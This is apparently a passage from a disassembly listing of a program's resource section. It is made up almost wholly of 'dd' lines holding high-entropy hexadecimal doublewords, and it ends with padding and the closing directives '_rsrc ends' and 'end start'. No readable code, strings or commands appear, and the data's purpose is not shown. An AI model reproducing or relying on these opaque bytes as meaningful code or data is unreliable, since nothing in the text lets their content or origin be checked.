dd 49F2642Eh, 0DD455A7Dh, 947973E3h, 73C7D166h, 6E65ABEEh
dd 67F7E84Ah, 4A9A7851h, 3C78C229h, 0ADD9375Fh, 0DCA0FE2Eh
dd 0BDE28E70h, 87828DBBh, 0B5CBF6F5h, 6E70C02Dh, 69F01574h
dd 46ACA353h, 0C36AA787h, 6CD34DFEh, 21A442FCh, 124B1C1Bh
dd 3593F860h, 8C6474FFh, 6A6B415Dh, 5BD5C79Fh, 0CDF6D15Ah
dd 0D340C7C7h, 0B1333B31h, 22A1C3FFh, 0E81D1Dh, 7B9A3A6h
dd 0FC76FD8Ah, 0EA6C7756h, 5CB5B5E4h, 0CE5153BEh, 14919FC8h
dd 27CA6C3Ah, 24978189h, 194D62Dh, 88B9094h, 7B975253h
dd 836E1F22h, 1DE1E7E5h, 3EC6A605h, 0D7C5FBE2h, 0E843CBBEh
dd 21C1FBFDh, 0C01B211Eh, 29A9276Eh, 85FF0501h, 0DC5DAEE1h
dd 9E66B0E6h, 0C4B64D2Ch, 2813469Ah, 0E3686D3Ch, 533E4EF8h
dd 0C11D130Ch, 0DAFA5517h, 0B194F852h, 6373495Dh, 37B7AFBFh
dd 5F0F1930h, 44C8CB5Bh, 7608EA3Eh, 0DBF4A3DAh, 0CA4F7589h
dd 5CC1C7C4h, 8796F654h, 71754B53h, 62E5E52Eh, 0F02DA05Ch
dd 8F5E2EC6h, 0EB3D736Ch, 666204Dh, 5E7C2714h, 30139992h
dd 0C6047E02h, 0E70BF0F1h, 7D0AEFDCh, 0C65BF4D3h, 99CED3E0h
dd 3EEDBA14h, 0D339B874h, 91232926h, 10956B1Ch, 0B8398D0Ah
dd 743F6F09h, 0E2E4F1D0h, 0D85D6381h, 3FEFEB52h, 82C001B5h
dd 69FDF0E6h, 6FAE095Dh, 5D96DB5Ch, 0EE58C127h, 0A52DD07Eh
dd 442C660Fh, 0E1066552h, 0F354D815h, 57434946h, 30B5BB09h
dd 0F07713ABh, 9196C9D5h, 860B11ABh, 54754503h, 0EEE0F8CEh
dd 0DC6167FDh, 0BDA6F9EAh, 0CF7F77E4h, 32B7313Fh, 8424822Ch
dd 2BBB81BEh, 0FC687431h, 0C6D3FAF7h, 0ED8D82D4h, 0B6439618h
dd 21A0AFACh, 0B24433CBh, 41969086h, 596CF746h, 0A2ACACA0h
dd 8A0F3202h, 3D36573h, 5EDF9063h, 0B0A55868h, 0BA878D8Ah
dd 0C4494F45h, 58CCAEFAh, 0CC4C5C5Ch, 0CB0A5AA2h, 9112738h
dd 0CDB5FD46h, 8B707231h, 0B3675D46h, 54DADFB4h, 901A00CAh
dd 0ED283C90h, 272F051Eh, 2CBAD731h, 47204916h, 52D5DADCh
dd 0E709ADABh, 0E458426Dh, 0A9FEE459h, 0F8679FC5h, 0BA7D3CC2h
dd 9C2559B9h, 0DD5BA9A6h, 94304693h, 2868C62h, 9976A0FCh
dd 0E6597213h, 68985C6Bh, 7FC65362h, 3C8FF58Fh, 23BACC35h
dd 209399EFh, 179EBEE9h, 4B7BDCFh, 46C76B75h, 6D697040h
dd 5AECD2D5h, 442656DDh, 0C1C0C6D5h, 801E51ADh, 7E6D41AAh
dd 0FD607958h, 56D4EBEDh, 1E897968h, 0A4001312h, 29B18986h
dd 1F63562Ch, 0C990074Ch, 50B768E0h, 20E6C6A8h, 0FF4A49E4h
dd 0BC3F1D97h, 0C1FC321Ch, 0EA6E7465h, 0A2ADE269h, 0A8ADA7A9h
dd 0DC04763h, 0B2363C3Ah, 632505CAh, 72288B1Ah, 0EA27F43Ch
dd 4A6B89F9h, 0BF704643h, 0A2B0EE8Fh, 0FF78C3C2h, 65B247C9h
dd 0ABFCBD33h, 0A0A57028h, 971C23BAh, 29E694FBh, 2D000602h
dd 788D731Fh, 5FD4C646h, 5A5A02D2h, 0DE41DE85h, 0B50A700Ah
dd 17973F26h, 7A9F2411h, 46F6693h, 7D685B54h, 5A8B7C1Dh
dd 61D6DCDAh, 0FF1DCBA4h, 0BA9AD0FDh, 870C718Ah, 0E43B4BB1h
dd 0C3201608h, 2015810h, 7F055E83h, 0CAF71A79h, 6F9CB4A6h
dd 0B8CF9F0Eh, 0AECCE2E3h, 0B93E4500h, 2B78083Eh, 2A2D2825h
dd 7B1984D9h, 856E1338h, 0A4787E7Ah, 49CB6512h, 800A626Fh
dd 6227412Eh, 0F8CB4673h, 0A671BB89h, 4C275277h, 9AB6EE12h
dd 0B7851641h, 0F6D7D14Eh, 6694732Ch, 0AB3B3704h, 0B932D3A7h
dd 94EFA31Ch, 5D3F9EBBh, 5225750Dh, 1C84CC10h, 864414BAh
dd 754809ACh, 276507F2h, 0E4D5EF6Bh, 0C6D2E8E5h, 88F17171h
dd 43B68C89h, 949D05A8h, 2E9A90ADh, 0B73C29BAh, 88FD8B81h
dd 580F090Ch, 9ED7E1A5h, 0C6D4EAE7h, 0F1760BC4h, 59E8EEBBh
dd 0A440602Eh, 179CA2F7h, 0CF14391h, 0FBB093FBh, 46036D0Ah
dd 529B6A57h, 51E6C9A1h, 0CCB7B6C8h, 0CA45FB39h, 94A9BBD0h
dd 739E9491h, 0DD107C13h, 9C1777D5h, 0E4F4CADBh, 0D1562BECh
dd 51381FDBh, 0C520001Dh, 1B815740h, 2CA73401h, 1B9096E8h
dd 8D78CC9Eh, 0AFB675D5h, 41C54906h, 76976E5Bh, 55EACC84h
dd 0F77FD7C4h, 3D37C4F1h, 66A5C917h, 96A2988Eh, 3A9F2644h
dd 1B6BCC2h, 47EDA970h, 704291E6h, 57EBD1E8h, 0F90ADEDAh
dd 1012C5F3h, 57D39CF7h, 2D72C2Ah, 0C0441B29h, 52D6DDD8h
dd 59F96B02h, 183A705Fh, 69F72F74h, 0B86B9753h, 58FAECFFh
dd 0C3505959h, 619ECECCh, 0FF737468h, 2BBABDE1h, 5B95939Bh
dd 0BA6B405Ch, 1E89B0BAh, 0B80C0918h, 51A4B5B5h, 0DF5C7A4Dh
dd 4FCAD9DFh, 0C963784Eh, 71FBEADCh, 0B9E6268h, 8B05202Eh
dd 1DBB8096h, 0BD343435h, 219395BBh, 0D7585A48h, 57D5C8D8h
dd 0E4705942h, 64EAE6F5h, 1592536Eh, 0B716161Ah, 338093B6h
dd 0AB213833h, 27AAB999h, 0EF525152h, 4DDDDAECh, 0ED725370h
dd 79CCF7F4h, 19966973h, 83180315h, 12BF9A88h, 0D0212831h
dd 16818299h, 0F16B7E6Bh, 45C2FCF2h, 0F76E4C52h, 5DD3E1F4h
dd 1365696Dh, 0AD2F0A01h, 597999Dh, 0B7012934h, 2BA0BCBEh
dd 0CE7E1D50h, 5AC2DFC0h, 0CE1F5747h, 69F6E5F5h, 0D6C4172h
dd 0F0777B0Ch, 62E7BDEAh, 0A6295F5Ch, 2BA2A9A1h, 0D3492D6Eh
dd 5AC3DBC0h, 0F2480945h, 4093F6F0h, 0A04E4841h, 8402050Dh
dd 1E8A8895h, 93083454h, 2BDF382h, 9A710C0Dh, 5ED8C192h
dd 94105C52h, 109573CDh, 35A0D0Ah, 0C4599991h, 96E37EEh
dd 0D85D5375h, 66E2402Dh, 54804774h, 44E2CDA9h, 4190A036h
dd 4B97ADB1h, 0F12733A0h, 0C8FAE754h, 4B98EE0Fh, 0F6AED8EFh
dd 3A5AD7E4h, 0D8E61E44h, 3E30361Dh, 2D271D01h, 24B2AB19h
dd 0C082EB0Eh, 6330F7Ah, 88EE4409h, 23D4EAABh, 26D3E9FAh
dd 0C0454A4Ch, 0B2242ECh
dd 4D291F00h, 169BA117h, 9DA4969Dh, 902F85B2h, 93FF9DF4h
dd 0EE4F20F3h, 74A958D8h, 0B3324942h, 34B9B754h, 0E56D622Eh
dd 54D1E78Eh, 979AEA12h, 0F781B7A8h, 4E78D36h, 888D3B6Ah
dd 0AD282223h, 0F46296D9h, 427B44BEh, 40FDCC32h, 1A9FA5A9h
dd 0D3525147h, 0BAADDAC9h, 8FF5B7B4h, 0D24B70FFh, 0AD9837DCh
dd 73C6AEB1h, 388DEF3Fh, 0AA2E315Ah, 895EF1A4h, 8E233537h
dd 858660h, 20B2A0FAh, 0B62D3825h, 29FBC8Dh, 371A5213h
dd 0A952D57h, 0AC37DE34h, 56FEA8A6h, 0C3404957h, 9779DA8Ah
dd 74C7D615h, 0B738A65Dh, 328AE28Ah, 0CA4D3B53h, 0C3E985C4h
dd 9E1AC6A3h, 0DF5B2AA8h, 1F45386Eh, 34AB7219h, 0ED7573FEh
dd 826A4057h, 40B4B0E2h, 9D4E5454h, 4B553996h, 4F320814h
dd 128F673Fh, 941DF41Ch, 55DD8E8Eh, 45C95245h, 0A520365Fh
dd 1A4B1BE3h, 25506679h, 3FC2C8CDh, 0C344494Eh, 45D2C2C2h
dd 6A481E5Ch, 37A1491Ah, 9D798B01h, 0E56E4459h, 0E6D6BD5h
dd 4752684Fh, 70E83D4Dh, 27C96D3Ah, 249882EDh, 961E488Dh
dd 0BD019290h, 79CE1D5Dh, 36CDFB2Ah, 0B5E2D8C9h, 30ABA8ABh
dd 0E5430BAFh, 0B3380E1Bh, 830F33FDh, 971C123Fh, 29EA011Ch
dd 2F500633h, 0ED18791Fh, 5FE682B5h, 44A9DC59h, 43F8E22Ah
dd 0C06080B8h, 0B0213F8Dh, 0CB1E1401h, 0BE1D90F9h, 7D3228A1h
dd 0BF242C23h, 0F419BEB8h, 0D36872BEh, 985F2F95h, 713C7213h
dd 19804A34h, 0F5C82623h, 0F26D6767h, 4F16778Ah, 0BDF3BB79h
dd 35E8DEFEh, 3D693F09h, 0B8332096h, 0AC72C186h, 7FE6B683h
dd 0D7CA1C7Ah, 0C86B6565h, 0B113408Ch, 0AC00287Bh, 97D118D9h
dd 529B9DA0h, 49FEC19Dh, 0EF362315h, 0A83F7186h, 9F141A68h
dd 40C7CDC8h, 0D2595F5Bh, 0D94F1582h, 0F213F2DFh, 0D96E484Ch
dd 3ECF3E12h, 0BD4EA031h, 67E7BAB7h, 0F1677B65h, 5FDCB0D2h
dd 10F51041h, 0F74CAE3Eh, 69EEF819h, 88283563h, 2C84ACB0h
dd 0FE213F2Bh, 0A449ECB9h, 0A31805F2h, 0EA2F2D0Eh, 0EF0C2223h
dd 0F97E8449h, 94F09CA5h, 0ED4E71F0h, 9D4157D7h, 4C467C56h
dd 3957906h, 0F278662Dh, 3C793760h, 4D8D1421h, 14150B8Fh
dd 3DF2C8EAh, 89650030h, 51D4B48Bh, 10B7CE4Bh, 0CA40DD55h
dd 9591B1D0h, 199E94B4h, 3781D67h, 2828896h, 5FD89362h
dd 0E16A8469h, 8FDEDBh, 0F6011302h, 7BF8EC8Dh, 3CD1347Dh
dd 1B908AE2h, 8D157086h, 4A098A87h, 71C6E44Fh, 4ED5E332h
dd 0BDDAD0F1h, 38B3A3C3h, 39BEC829h, 0E5796133h, 49E7E6ECh
dd 0C3585E39h, 40137389h, 0F6F7CDD7h, 0D0ED60ADh, 0C4DBE1DDh
dd 0C94D5639h, 0CF0A48C3h, 0F431072Dh, 336A142Ah, 0C4FD1B29h
dd 8078727Ah, 45D43340h, 6365706Fh, 59DCE0F1h, 0CADEB8D2h
dd 5594C6C5h, 0AF323936h, 0D093F56h, 57971C2Bh, 5888F1Dh
dd 1D2D74AFh, 7C942371h, 5BEDCF2Eh, 0B81695D0h, 2C49AFCAh
dd 24CC3939h, 239587C2h, 2894FFF6h, 7B9AF29h, 0F5D27401h
dd 0DA4DD9F7h, 0C920B5E4h, 0CE617BEFh, 0C4CC094Dh, 0B2353AB3h
dd 0AFABED27h, 1929E01Eh, 38AB3715h, 8778C502h, 0EA6F455Dh
dd 5C8BE78Fh, 5AAC5B3Dh, 41F5E70Ch, 0BCC8C5B8h, 25A8CF29h
dd 296B21Fh, 9BDB333h, 29AD1569h, 0C0C4E28Bh, 9E66E9D6h
dd 0D115DE57h, 0FF4ACDCAh, 0B4091FF8h, 5743B91Fh, 0F0E2DCD6h
dd 0A8F9506h, 0F5E72C5Ah, 11275D42h, 50C9DA7Dh, 0EAD05Ah
dd 0F5C9FFECh, 4069A93Fh, 0BD204C4Fh, 9A2F059Dh, 18F997FEh
dd 2C030906h, 31E0842Bh, 0EFE7DDC6h, 594D7B18h, 76FB9E5Bh
dd 0E321340h, 0EEB3EB8h, 94C1E630h, 1C92D394h, 0CA170942h
dd 0D6337679h, 6B086FE4h, 8753819Fh, 58E997DBh, 376F77BDh
dd 1C9D4809h, 9E3FC126h, 3EB09B98h, 0AC27753Ch, 0CE59515Ch
dd 48CED4CBh, 0A0781B58h, 40BCF0F2h, 0F208080Eh, 0D1E4B996h
dd 900ECEBDh, 0BE531C9Ah, 0EE090F0Ch, 0A52CD17Eh, 442C660Fh
dd 57D46552h, 4CE1C2E6h, 0A5A0492Ch, 61B872D3h, 0A22728C2h
dd 70BCB99Ch, 795C1104h, 0C8566615h, 662B76F2h, 0B46A8C34h
dd 4ED3D9DEh, 0E09DF6C5h, 61E0BD8Ah, 88E8BAD3h, 0D61EA1AEh
dd 3D80476Eh, 0FA4FA97Dh, 79C35277h, 53636956h, 60FB2555h
dd 0A889664Ah, 67EFEEBCh, 8A96A4D1h, 0E01EA390h, 1B206B12h
dd 490C790Fh, 6EC3D509h, 4E9766D8h, 0BAB7CDAFh, 3BB6B916h
dd 0D5ACB3DFh, 0A95ABE39h, 0D5144F49h, 319CD93Fh, 0FEB3A579h
dd 87725F0Bh, 1D34D481h, 64F56E49h, 0A9F6D14Eh, 39BDF3D5h
dd 9A471F46h, 0E3A1A7D1h, 0BE3F7083h, 0FE380B88h, 72F6CCD4h
dd 61AF7F18h, 56EAC078h, 0C84C5250h, 14404104h, 45303604h
dd 0E15D56AEh, 9010D845h, 2C793907h, 8BA1FDCCh, 0D64562FBh
dd 0A72362E0h, 0CAF6D75Dh, 0B936C5C4h, 0AE010735h, 0DFF5A9C2h
dd 0A239468Fh, 0B47088Ch, 76F85A7Ah, 0B8AA5B70h, 0ADF88B2h
dd 0CC26553Eh, 6800C6C6h, 9BC3ADC7h, 0DA27AA9Ah, 0A69213E3h
dd 8F888E8Ah, 47CA0785h, 0E2E1FF71h, 0D6DED4D3h, 0FD6045C0h
dd 559099C7h, 24CB6A39h, 239680BEh, 9AE7E69Eh, 78E900Bh
dd 87FC6801h, 0DA5E73C7h, 4D7519E4h, 4D52687Ah, 0C4CB3530h
dd 0B2363FD3h, 14B32B25h, 5F29202Eh, 58DD5193h, 28FA6E53h
dd 0DB77C38Ch, 0C81DE8D5h, 0CF6471A2h, 0C5C90C4Ch, 0B3383DFEh
dd 0A023799Eh, 972C1200h, 61DFC5C0h, 7B0F061Ch, 0A8E78725h
dd 0DAE4DACBh, 0AFD25399h, 0CAC8CEC8h, 850A63B8h, 6C2771AFh
dd 0F94D9C19h, 0D9A39693h, 8CF5C906h, 6AFD9B80h, 61D6DCC6h
dd 6B6415D0h, 45CACB01h, 763F900Ch, 0C8594546h, 0AB07A3AAh
dd 25198A5h, 860241B0h, 0A2FB4A9Ah, 205FE1F3h, 9C8A6349h
dd 44E413A4h, 0E604C591h, 0D2DEDFC4h, 1E6B3651h, 7D9596EDh
dd 0BD4D87D6h, 0F06C3CF0h, 2167E0AFh, 0EAB9D17h, 0CCF515F2h
dd 0BB707658h, 6939E176h, 17AD2603h, 11969C21h, 0B2CBCE38h
dd 0C554B74Fh, 56C2C2C1h, 922A2A41h, 3BBCB8A1h, 0D32B6624h
dd 25B9D5D1h, 0C74F100Ah, 76F5FFE9h, 0E678632Dh, 8314A042h
dd 46D48485h, 9014284Ch, 3DBEB6A7h, 0D12D6426h, 4399D3DFh
dd 0CA170148h, 35B891A0h, 0F3687B78h, 0D94FB9E9h, 0C99939Bh
dd 0EC5F1C0Dh, 36A0A9F7h, 0E37B2925h, 57CAD1D9h, 95104248h
dd 38A09CBDh, 0E87C7278h, 0F6BEE3EEh, 0E60C73FFh, 0EF5471EAh
dd 0D2986CD9h, 6DBA4AA2h, 0A3BC9C8h, 0C95E795Bh, 925D50D4h
dd 909D9DEDh, 4D82B8B5h, 6A1D79CBh, 0F13C29Bh, 26F7E15Bh
dd 0C40DDBBAh, 0E8631D9Ah, 0E66C09EEh, 0F3D5FFE7h, 65EC335Ah
dd 0FF8488ABh, 71F6A491h, 1280356Bh, 21251F20h, 0DCC1D96Fh
dd 0B4BEF4F1h, 641B3707h, 2E9E25EBh, 8B0E9EAh, 0F80150h
dd 54424876h, 16956F5Dh, 9850227Bh, 74C058BAh, 3B8FEB3Ch
dd 9EEEBCC9h, 7E9F056Eh, 0EB291D6Bh, 23AB8FFCh, 1A4C257h
dd 93444C83h, 2CDCDE3Ch, 4073B7BBh, 6E4500C4h, 0AF320807h
dd 64FCEF94h, 0AE24681Bh, 5DACDDEh, 88DCD48Bh, 0D46B8E8Eh
dd 5B90B7ABh, 9D724721h, 4BC1978Fh, 0E2720432h, 0A6AAABFBh
dd 6AE8E35Ch, 37DA0A71h, 4B100131h, 1593EC9Bh, 61DC6E1Bh
dd 8D1F1E01h, 0BEE44DC7h, 0E508C4C5h, 2BE9F8EFh, 69E7039Ah
dd 4BDCAC6Fh, 0FDF23131h, 14908B62h, 9B2B7D8h, 0C9D75618h
dd 723A3437h, 4E19D5E0h, 0A1A65052h, 68E4DCE6h, 1F6541A2h
dd 92FF0503h, 138E892Dh, 5EE3E90Eh, 3DD40658h, 42F7E4F3h
dd 0B4380DD5h, 1454D5AEh
dd 0A83E96ABh, 83EB95A2h, 2FBC8726h, 0EF734946h, 0CE0DE19Dh
dd 3BA8A2A4h, 44C9CEDFh, 0FB05C058h, 2028BCEAh, 111F2523h
dd 0D292ABCAh, 2E388860h, 8F0743Dh, 95E7EDEAh, 0F459491Fh
dd 0C3C4D1CEh, 0B83D43ABh, 28F3F644h, 9CC0A32Bh, 70129996h
dd 0A0252B28h, 26F3725Ah, 8CE9EFECh, 29A49CF9h, 480451DFh
dd 0F8B44542h, 3CFB3CBCh, 9A50E80Dh, 157E5BABh, 0C88EC509h
dd 0DFFCF66Ch, 8EEBC1DEh, 27A29E36h, 4ACF7A3Ah, 9BDCCC44h
dd 2DB38986h, 901500B5h, 0EEF9759Ah, 6F0F3h, 0F67B81F1h
dd 58CE467Bh, 84D46552h, 0A40FD4E8h, 41BCB411h, 7A34C6CAh
dd 0A2274D0Eh, 4267147Ch, 0B1F6B0Dh, 0C86D8335h, 7A95F6F2h
dd 0DC6794DDh, 0EB208ED6h, 0C2A64AF9h, 6CE81949h, 3618207Eh
dd 16192613h, 16B1310h, 5801E12h, 89211F0Bh, 55399699h
dd 1AD6D792h, 0C406C05Ah, 0BD91FC97h, 0A62B6EA9h, 38DB64A0h
dd 0AA2F3532h, 77A9CC0Dh, 0EB78E9BCh, 0E0555B4Fh, 21DF97E3h
dd 0CC03C64Fh, 0B5AB83BFh, 232D6B53h, 2AAF8A27h, 84531614h
dd 0CDD3CA87h, 527E9F2Ah, 0BA65E20Eh, 64DE625Fh, 0C94B517Eh
dd 0C7415744h, 899ACACDh, 0E3A19794h, 0BE3F7483h, 1F307488h
dd 8DF6CCCAh, 0D443A3F9h, 5D576DDEh, 454C6260h, 0A8ED757h
dd 0C6626734h, 191757A6h, 6F142A28h, 32AAE91Fh, 734202FCh
dd 19695F5Eh, 68F02C75h, 35F8DE52h, 0C3BFF5EAh, 9E013483h
dd 0B55CFFA8h, 92253747h, 3480280Fh, 0B5F8FECEh, 0E86A7098h
dd 5BB6BFE2h, 0E6A3B9D5h, 0CE98C6F6h, 0C8B7F937h, 0A7A49ABFh
dd 5C95DFDCh, 0C7877E71h, 47EF7885h, 0F951B171h, 2EDECEE3h
dd 0B1D13049h, 4EAEC4E3h, 5954294Ch, 0DC59536Fh, 0CEF01B68h
dd 0EF756F72h, 8703FDD3h, 0C7915A13h, 4ED4B09Ch, 0CE527DEEh
dd 0E52CAAC8h, 0C7C9C3C5h, 0EC2595h, 69AFAD2Eh, 838CA2BEh
dd 0F8980C52h, 98727049h, 5D8ABEC0h, 4454A557h, 13C6A60Dh
dd 1AADC16Bh, 0A6AA8081h, 0A99D2ADBh, 55B1ABCDh, 0BD830576h
dd 107A9071h, 200C1518h, 0B0A9A3A6h, 43BC7608h, 4D1403Dh
dd 27AC9D17h, 990ECC21h, 2B529693h, 7D32B005h, 0EC9C7A77h
dd 0A3E6ECE9h, 87D55E7Fh, 6B07DCE9h, 0CB3CBABCh, 2946D4A8h
dd 10202623h, 50A2BCC1h, 9285108Ch, 0F14657CEh, 9C06E903h
dd 0D19801A2h, 0Dh dup(0)
dd 1500h dup(?)
_rsrc ends
end start